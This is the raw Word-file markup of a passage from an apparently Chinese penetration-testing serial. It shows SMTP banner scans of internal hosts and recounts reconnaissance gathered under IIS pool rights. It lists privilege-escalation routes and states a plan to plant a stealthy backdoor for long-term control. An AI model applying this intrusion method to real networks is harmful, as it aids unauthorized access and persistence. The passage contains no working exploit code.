      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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xxxxxxxxxxxxxxxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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MAIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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Service,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Version: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7.5.7601.17514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ready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at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Wed,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14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Feb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2018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18:28:44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+0800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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\x0d\x0a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536"/>
        </w:tabs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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[+]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.0.0.5:25</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-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10.0.0.5:25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SMTP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220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xxxxxxxxxxxxxxxxx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Microsoft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ESMTP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3" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1413" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MAIL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Service,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Version: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7.5.7601.17514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ready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at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Wed,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14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Feb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2018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18:29:05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+0800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\x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0d\x0a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596"/>
        </w:tabs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[+]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-22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10.0.0.14:25</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="1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10.0.0.14:25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="1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SMTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="18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220</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="1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xxxxxxxxxxxxxxxxxt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="1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ESMTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="18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MAIL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Service,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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Version:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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7.0.6002.18264</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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ready</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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Wed,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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Feb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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2018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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18:30:32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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+0800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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\x0d\x0a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9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在iis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-40"/>
        </w:rPr>
        <w:t> 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apppool\xxxx的权限下，目前得知该目标内网分配段，安装软件，杀毒，端口，服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92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务，补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>丁更新频率，管理员上线操作时间段，数据库配置信息，域用户详细信息（英文user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对应的职务，姓名等）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，以上数据等待信息分析业务，来确定攻击方向。如财务组，如cxx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组等。并且</w:t>
      </w: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完成了刺探等级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1-4</w:t>
      </w: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508" w:firstLine="0"/>
      </w:pP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而在以上的信息搜集过程中，提权不在是我考虑的问题了，可以Filezilla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server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提权，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mssqsl数据库提权，win03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46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提权，win2000提权，win08提权，iis.x提权，内网映射提权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等。而现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在需要做的是如何反制被发现来制定目标业务后门，以便长期控制。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226.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId3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23" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1133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下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一季的连载，将会从三方面来讲述大型内网的信息刺探，既有0day的admin权限下刺探，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无提权下的guest/users权限下刺探。数据库下的权限刺探。域权限延伸到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办公PC机的信息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刺探。以及只有路由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>权限下的信息刺探。原来在渗透过程中，提权是次要的，信息刺探才是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渗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>透的本质。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1" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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Micr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	<Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/28.jpeg" />
	<Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/29.jpeg" />
	<Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/30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